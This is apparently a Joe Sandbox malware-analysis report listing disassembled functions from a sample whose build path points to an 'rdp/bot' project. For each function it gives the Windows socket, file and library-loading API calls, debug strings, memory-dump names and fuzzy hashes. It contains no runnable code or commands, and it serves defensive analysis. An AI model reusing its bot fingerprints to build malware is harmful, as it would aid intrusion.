Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 91b357227b99bab9effa702d5ab2d6446ce4f24f9651ab396ace6123a249b1dc
Instruction ID: 2a3ce96c773be97b4fac22bbfd501176ef882bfab2d768748354f9fde67b20fa
Opcode Fuzzy Hash: 91b357227b99bab9effa702d5ab2d6446ce4f24f9651ab396ace6123a249b1dc
Instruction Fuzzy Hash: 6B113075A1C59296E330AF69E8004B566A1FF89754F104235EAED837B8EF7CD50A8F00

Function 00007FFE0EC02294 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EC022BC
setsockopt.WS2_32 ref: 00007FFE0EC022E8
WSAGetLastError.WS2_32 ref: 00007FFE0EC022FF
WSAGetLastError.WS2_32 ref: 00007FFE0EC02324

Strings

tcp_set_timeo, xrefs: 00007FFE0EC0230F, 00007FFE0EC02334
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EC02316
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EC0233B

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
Instruction ID: fa96cd19b0b60d3f2d9fe56aa5ed1e4a9aa9873d8a32622913dc2afc1629e5c5
Opcode Fuzzy Hash: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
Instruction Fuzzy Hash: 9A110870A081D2A6F364AB65F4840756660FF89754F504231EDAD83BF5DF7DD509CB02

Function 00007FFE0E162154 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0E16217C
setsockopt.WS2_32 ref: 00007FFE0E1621A8
WSAGetLastError.WS2_32 ref: 00007FFE0E1621BF
WSAGetLastError.WS2_32 ref: 00007FFE0E1621E4

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E1621D6
tcp_set_timeo, xrefs: 00007FFE0E1621CF, 00007FFE0E1621F4
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E1621FB

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 3bfaa4a80639916eba1a0dc93ee1bfbb9301a9e214be40c6f5af664c170a041f
Instruction ID: 96392233d462ee23b98f42f5f5bdf917eb723852cf4880b8a591e347f2f528ca
Opcode Fuzzy Hash: 3bfaa4a80639916eba1a0dc93ee1bfbb9301a9e214be40c6f5af664c170a041f
Instruction Fuzzy Hash: 9D112E71A0C55696F360AB26E8004666671AF88754F104237EAEE836B5DF7CD549CB00

Function 00007FFE13306230 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FFE13306262
GetProcessHeap.KERNEL32 ref: 00007FFE1330626D
HeapFree.KERNEL32 ref: 00007FFE1330627E
EnterCriticalSection.KERNEL32 ref: 00007FFE133062A2
LeaveCriticalSection.KERNEL32 ref: 00007FFE133062C5
EnterCriticalSection.KERNEL32 ref: 00007FFE13306332

Strings

[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE1330631F
routine_tx, xrefs: 00007FFE13306318

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CriticalSection$EnterHeapLeave$FreeProcess
String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
API String ID: 2539320189-3555278722
Opcode ID: 36001a8ed69bcda54c651700ee6af56c6e3160d2e789e3dc6c537e90f91aaa97
Instruction ID: 857fa6a8120e158d4b3d94f9c1b01cd919513c2fc3f3ee2a1983c21cddc47daf
Opcode Fuzzy Hash: 36001a8ed69bcda54c651700ee6af56c6e3160d2e789e3dc6c537e90f91aaa97
Instruction Fuzzy Hash: 7C310C35A08E02CAEB248B13E840229B364EB64BB4F184175DA6D67B79CF3CE4419348

Function 00007FFE11507E69 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE11507E72
GetLastError.KERNEL32 ref: 00007FFE11507EB7

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11507E8F
(path != NULL), xrefs: 00007FFE11507E96
fs_path_exists, xrefs: 00007FFE11507E9D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11507EA4

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-1112464793
Opcode ID: 3cc48ef8b18bf0d65c767a1061d8ac125db0c37b3621887fc9af1ba8ee2a1bea
Instruction ID: 7ba44d8a38d5cefaf94a26b534981972f27032854bd56223e93b490ac41ceac9
Opcode Fuzzy Hash: 3cc48ef8b18bf0d65c767a1061d8ac125db0c37b3621887fc9af1ba8ee2a1bea
Instruction Fuzzy Hash: D021FC60E0EC838AF7A047EA944437C124DAF01339F6445BEE1DECA1F4DE2DEE859242

Function 00007FFE0EBD66C9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE0EBD66D2
GetLastError.KERNEL32 ref: 00007FFE0EBD6717

Strings

fs_path_exists, xrefs: 00007FFE0EBD66FD
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE0EBD66EF
(path != NULL), xrefs: 00007FFE0EBD66F6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EBD6704

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-1112464793
Opcode ID: bb7ab14be6bd40bba2094a4d380e504bdcc41b778acc424642ca6a2b53163314
Instruction ID: 76d2fba2e5229220850bb391bd2f41615d29094f397ba301eac26d6e346e5275
Opcode Fuzzy Hash: bb7ab14be6bd40bba2094a4d380e504bdcc41b778acc424642ca6a2b53163314
Instruction Fuzzy Hash: 34218090E0D48782FB348E98A4543F82355AF00329F248532D5DFCA2FAEE1DE8859E02

Function 00007FF6BFD643A9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00007FF6BFD682A5), ref: 00007FF6BFD643B2
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF6BFD682A5), ref: 00007FF6BFD643F7

Strings

fs_path_exists, xrefs: 00007FF6BFD643DD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD643E4
(path != NULL), xrefs: 00007FF6BFD643D6
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6BFD643CF

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-1112464793
Opcode ID: 4c9deac3ad3846ce87ba50fd85f43f8bfee23200bc165dcce4c80e2aa1f1ac2a
Instruction ID: 3e819a7466f0205ff97019d8a93c66e220d0151d4af050a7d4915002dbb2ad38
Opcode Fuzzy Hash: 4c9deac3ad3846ce87ba50fd85f43f8bfee23200bc165dcce4c80e2aa1f1ac2a
Instruction Fuzzy Hash: 6A219750E4C583A2FB60AADC96453BC6340AF02319F246B32F34ECA5F4CF5DF8855282

Function 00007FFE115020EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE11502112
WSAGetLastError.WS2_32 ref: 00007FFE1150212C

Strings

tcp_recv, xrefs: 00007FFE11502146, 00007FFE1150215E, 00007FFE11502183
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE1150218A
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1150214D
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE11502165

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: e06e6ac3a5b737bed27b0c1f2aa3504afd0db6bad35eb42f4d1670c5dba4e5a4
Instruction ID: bb9c0df8e9a75dd6379b9e460f3045427795c555c4ea0916813324bf74af14da
Opcode Fuzzy Hash: e06e6ac3a5b737bed27b0c1f2aa3504afd0db6bad35eb42f4d1670c5dba4e5a4
Instruction Fuzzy Hash: 27118F64A0CD1391FB2153A7AC4067C2659AF457F0F4063B9EE3D8A6F5DF1CA9178700

Function 00007FFE13301C0A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE13301C32
WSAGetLastError.WS2_32 ref: 00007FFE13301C4C

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE13301CAA
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE13301C85
tcp_recv, xrefs: 00007FFE13301C66, 00007FFE13301C7E, 00007FFE13301CA3
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE13301C6D

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 2d2e178c0c84d47958ca5a4b1444a6b03feedde3d07fdb9a944df0385b2d5f4a
Instruction ID: d625dcacc36634493a07f6578926aa1e619ccab117feb3266361ca09ce37cf76
Opcode Fuzzy Hash: 2d2e178c0c84d47958ca5a4b1444a6b03feedde3d07fdb9a944df0385b2d5f4a
Instruction Fuzzy Hash: D211BF94F0CD178AFA109317A8422BC1200AF717B4F4013B1E83EB66F7DE5CE9129308

Function 00007FFE0EB4559A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0EB455C2
WSAGetLastError.WS2_32 ref: 00007FFE0EB455DC

Strings

[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0EB45615
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0EB4563A
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EB455FD
tcp_recv, xrefs: 00007FFE0EB455F6, 00007FFE0EB4560E, 00007FFE0EB45633

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: a021e5ef6c9586560b76b53494add684adde04dba7e40392e4befabed449ac76
Instruction ID: e56dc9eff2860ec37c974bd0888b7b1d097aeb1c1e0e716b6859889fbf120d95
Opcode Fuzzy Hash: a021e5ef6c9586560b76b53494add684adde04dba7e40392e4befabed449ac76
Instruction Fuzzy Hash: 7E116D91E1EA0B56FA349F29A8403B81251AF407B0F508331DDAD866F1EE2CA5468B00

Function 00007FFE0EBD2A1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0EBD2A42
WSAGetLastError.WS2_32 ref: 00007FFE0EBD2A5C

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0EBD2ABA
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EBD2A7D
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0EBD2A95
tcp_recv, xrefs: 00007FFE0EBD2A76, 00007FFE0EBD2A8E, 00007FFE0EBD2AB3

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 2769e85300a6225c4f4f4af3d49a9cda37af30217e15780f35fffe4d91a28b8b
Instruction ID: 0ff2bc9d7e82ad617b58cae23cba37a60044772aee02322c05e6e01a4f1ea8c7
Opcode Fuzzy Hash: 2769e85300a6225c4f4f4af3d49a9cda37af30217e15780f35fffe4d91a28b8b
Instruction Fuzzy Hash: 01114C60A0C69791F6305F28A8412F91690AF457B4E505731D8EE8B7F9FE1CEA468F40

Function 00007FFE0EC02B5A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0EC02B82
WSAGetLastError.WS2_32 ref: 00007FFE0EC02B9C

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0EC02BFA
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0EC02BD5
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EC02BBD
tcp_recv, xrefs: 00007FFE0EC02BB6, 00007FFE0EC02BCE, 00007FFE0EC02BF3

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
Instruction ID: a5c92822cba8179eac91608ba5b8e969db33ed80fdbc44008ac1e737e588fc2c
Opcode Fuzzy Hash: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
Instruction Fuzzy Hash: E9110614F0C5D7B1F9186B58ACC42B813456F067B0F400771DCEE8A2F3DE1EA542A302

Function 00007FF6BFD61694 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,service,0000013B444313D0,00007FF6BFD69404), ref: 00007FF6BFD616A2

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

GetLastError.KERNEL32(?,?,service,0000013B444313D0,00007FF6BFD69404), ref: 00007FF6BFD616CE

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF6BFD616BD
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF6BFD616E1
module_load, xrefs: 00007FF6BFD616B6, 00007FF6BFD616DA
service, xrefs: 00007FF6BFD61695

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
API String ID: 4085810780-4145076245
Opcode ID: 1a562aef5cc623c6b3c41f53663e287007a7854ec2e1844506a1c76ec2df1022
Instruction ID: 6c04683cc9991e1514ccdc521adb4235fc0c304dbd21824c0f27a76221524e91
Opcode Fuzzy Hash: 1a562aef5cc623c6b3c41f53663e287007a7854ec2e1844506a1c76ec2df1022
Instruction Fuzzy Hash: 88F0BE10B0A60391ED11A7DEA8541B437506F08FC4F481B32EF0CCA3B1EE2CA686C380

Function 00007FFE115024AE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE115024C0

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11502514
Done, xrefs: 00007FFE115024CA
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE115024FF
net_init, xrefs: 00007FFE115024D1, 00007FFE115024F5
[I] (%s) -> %s, xrefs: 00007FFE115024D8

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
